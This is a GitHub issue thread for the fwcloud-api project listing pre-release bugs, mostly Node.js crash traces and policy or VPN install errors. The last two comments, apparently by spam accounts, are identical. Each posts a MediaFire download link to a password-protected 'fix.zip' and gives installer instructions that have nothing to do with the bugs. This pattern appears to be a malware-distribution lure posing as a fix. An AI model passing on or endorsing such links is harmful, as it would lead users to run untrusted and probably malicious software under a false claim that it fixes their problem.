### ISSUE TITLE
Before v2 publish review

### ISSUE THREAD

**Issue by soltecsis-aortega** [soltecsis/fwcloud-api#805]
- [x]  API crashes when changing rule color
2024-08-20 13:30:59|DEBUG|METHOD: PUT   PATHNAME: /policy/rule/style
/opt/fwcloud/api/dist/src/routes/policy/rule.js:205
   const policyRuleRepository = getCustomRepository(policy_rule_repository_1.PolicyRuleRepository);
ReferenceError: getCustomRepository is not defined
   at /opt/fwcloud/api/dist/src/routes/policy/rule.js:205:34
   at Layer.handle [as handle_request] (/opt/fwcloud/api/node_modules/express/lib/router/layer.js:95:5)
   at next (/opt/fwcloud/api/node_modules/express/lib/router/route.js:149:13)
   at /opt/fwcloud/api/dist/src/utils/utils.js:75:21
   at process.processTicksAndRejections (node:internal/process/task_queues:95:5)

- [x] API crashes when disabling a rule
2024-08-20 14:53:21|DEBUG|METHOD: PUT PATHNAME: /policy/rule/active
/opt/fwcloud/api/dist/src/routes/policy/rule.js:185
const policyRuleRepository = getCustomRepository(policy_rule_repository_1.PolicyRuleRepository);
^

ReferenceError: getCustomRepository is not defined
at /opt/fwcloud/api/dist/src/routes/policy/rule.js:185:34
at Layer.handle [as handle_request] (/opt/fwcloud/api/node_modules/express/lib/router/layer.js:95:5)
at next (/opt/fwcloud/api/node_modules/express/lib/router/route.js:149:13)
at /opt/fwcloud/api/dist/src/utils/utils.js:75:21
at process.processTicksAndRejections (node:internal/process/task_queues:95:5)

- [x] API crashes when creating a new group for rules
2024-08-20 14:56:50|DEBUG|METHOD: POST PATHNAME: /policy/group
/opt/fwcloud/api/dist/src/routes/policy/group.js:40
const policyGroupRepository = database_manager_1.default.getSource().manager.db.getSource().manager.getRepository(PolicyGroup_1.PolicyGroup);
^
TypeError: Cannot read properties of undefined (reading 'getSource')
at /opt/fwcloud/api/dist/src/routes/policy/group.js:40:84
at Layer.handle [as handle_request] (/opt/fwcloud/api/node_modules/express/lib/router/layer.js:95:5)
at next (/opt/fwcloud/api/node_modules/express/lib/router/route.js:149:13)
at Route.dispatch (/opt/fwcloud/api/node_modules/express/lib/router/route.js:119:3)
at Layer.handle [as handle_request] (/opt/fwcloud/api/node_modules/express/lib/router/layer.js:95:5)
at /opt/fwcloud/api/node_modules/express/lib/router/index.js:284:15
at Function.process_params (/opt/fwcloud/api/node_modules/express/lib/router/index.js:346:12)
at next (/opt/fwcloud/api/node_modules/express/lib/router/index.js:280:10)
at Function.handle (/opt/fwcloud/api/node_modules/express/lib/router/index.js:175:3)
at router (/opt/fwcloud/api/node_modules/express/lib/router/index.js:47:12)

- [x] Policy is not installed
2024-08-21 13:45:26|DEBUG|METHOD: POST PATHNAME: /policy/install?channel_id=c9d5a1ac-8584-4f7b-8988-8b2439c179ce
2024-08-21 13:45:26|ERROR|Installing policy script: You must provide selection conditions in order to find a single row.

- [x] The VPN server configuration cannot be installed, uninstalled or delete it
2024-08-22 13:39:10|DEBUG|METHOD: PUT PATHNAME: /vpn/openvpn/install?channel_id=833adfd1-65a8-448d-b512-cfc118e2789d
2024-08-22 13:39:11|ERROR|You must provide selection conditions in order to find a single row.

- [x] When there is a set of rules and we move the rules it does not work correctly.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
